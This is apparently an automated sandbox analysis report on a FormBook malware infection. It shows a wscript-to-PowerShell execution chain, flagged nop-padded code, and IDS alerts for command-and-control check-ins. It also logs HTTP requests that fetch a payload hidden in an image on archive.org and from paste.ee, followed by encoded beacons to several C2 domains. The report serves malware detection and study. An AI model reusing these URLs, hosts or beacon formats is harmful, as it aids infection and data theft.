Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdbGCTL source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dllhost.pdb source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dllhost.pdbGCTL source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0309C3C0 FindFirstFileW,FindNextFileW,FindClose, 11_2_0309C3C0

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 4x nop then xor eax, eax 11_2_03089A80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 4x nop then pop edi 11_2_0308E02B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 4x nop then pop edi 11_2_030A24F5
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 4x nop then mov ebx, 00000004h 11_2_036804E2
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then pop edi 12_2_05451D61
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then pop edi 12_2_05461CFB
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then xor eax, eax 12_2_05456618
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then pop edi 12_2_05452A60
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 4x nop then mov esp, ebp 12_2_05450AA0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49959 -> 172.96.186.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49965 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49967 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49955 -> 18.163.12.6:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49960 -> 172.96.186.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49958 -> 172.96.186.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49963 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49954 -> 18.163.12.6:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49956 -> 18.163.12.6:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49964 -> 188.114.96.3:80
Source: Network traffic Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49724 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.6:49711
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: paste.ee
Performs DNS queries to domains with low reputation
Source: DNS query: www.568060007.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /d/mFPBh/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /d/mFPBh/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fx9f/?mBsxM=YJ0LnZ68&-Xr8=yLkskDR0nY0t6IEYTVnouV0HkzfvHuAPmfbD5h8cln4aJalo4AVzLarmhH7o5TO/QYT7rLdNwPAjvarY55z4bEJvcGnuntwn6BS5zidhK+0y0eRY5oQOsBmzZX59GbhTRCQZQus= HTTP/1.1Host: www.autoclean.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /2jpw/?-Xr8=qz9UzJ10+p/cjPnRdZlHv4YDQxf45KubwzSEjjTwjD/nUvv1s93evwIp+LTko4UKBcY0h9JnEtV5jsbq23POiYFTmg8OGBnfOhN/rQscVBLiXL1oe2kzRKc9D7hJiq/ZgM9Sylw=&mBsxM=YJ0LnZ68 HTTP/1.1Host: www.568060007.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /iaoq/?-Xr8=nL2348Pfr+NFoI01B13i6ooM2GhLPn5db8T/pNEZx3omavlXh0CLNHmy0NPG1pf7zjIobHCC6tPoB9SY98rXt0wu24FP/Owek6nccbtLOiVilNhWN1FN3veqOsXp1hjRF8Z6s4A=&mBsxM=YJ0LnZ68 HTTP/1.1Host: www.elitecbdgummies.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic HTTP traffic detected: GET /ojib/?-Xr8=9xYabYlQOuR2q+ns8Lzx9bRF8NZUoInv7x1TfUGCdfPrsqjtDMlDvLTTdBF+pu/1Frk+h/DxANwT0Hfs8j1jMkaM33w5ilCaxHtuGNiB0DtKNuQLcX24gGfpbrwRywwLDdzHNLM=&mBsxM=YJ0LnZ68 HTTP/1.1Host: www.airgame.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
Source: global traffic DNS traffic detected: DNS query: ia600102.us.archive.org
Source: global traffic DNS traffic detected: DNS query: paste.ee
Source: global traffic DNS traffic detected: DNS query: www.autoclean.shop
Source: global traffic DNS traffic detected: DNS query: www.568060007.xyz
Source: global traffic DNS traffic detected: DNS query: www.elitecbdgummies.net
Source: global traffic DNS traffic detected: DNS query: www.airgame.store
Source: global traffic DNS traffic detected: DNS query: www.1ns6mg.vip
Source: unknown HTTP traffic detected: POST /2jpw/ HTTP/1.1Host: www.568060007.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 209Origin: http://www.568060007.xyzReferer: http://www.568060007.xyz/2jpw/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 2d 58 72 38 3d 6e 78 56 30 77 35 35 72 78 5a 69 5a 72 66 44 5a 61 35 31 66 72 39 6b 6f 52 78 7a 45 31 71 4f 2b 6b 54 44 59 32 7a 6e 35 78 53 54 78 47 4a 2f 41 6a 64 6a 77 79 53 49 48 2f 35 62 4c 71 71 4a 6b 4d 6f 59 6f 6c 38 4d 52 46 50 56 38 30 75 2b 61 35 68 65 43 33 70 78 4d 6e 47 4e 31 4a 51 33 46 4e 41 31 4c 68 67 55 66 4d 6b 62 42 51 35 35 35 44 79 49 49 51 64 4d 48 4e 70 63 66 71 70 72 73 30 2b 6c 55 79 79 39 6e 58 70 42 41 5a 6a 66 75 33 46 79 48 70 57 43 4d 77 45 39 58 39 35 6c 59 43 37 35 68 44 53 76 2f 77 62 56 61 6b 47 35 4a 6c 61 38 49 32 41 45 58 71 6d 44 53 63 6b 2f 36 6d 41 33 7a 6c 4b 45 4b 6a 59 6f 4b Data Ascii: -Xr8=nxV0w55rxZiZrfDZa51fr9koRxzE1qO+kTDY2zn5xSTxGJ/AjdjwySIH/5bLqqJkMoYol8MRFPV80u+a5heC3pxMnGN1JQ3FNA1LhgUfMkbBQ555DyIIQdMHNpcfqprs0+lUyy9nXpBAZjfu3FyHpWCMwE9X95lYC75hDSv/wbVakG5Jla8I2AEXqmDSck/6mA3zlKEKjYoK
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GETAccess-Control-Allow-Headers: Content-Type, AuthorizationDate: Thu, 10 Oct 2024 08:01:24 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 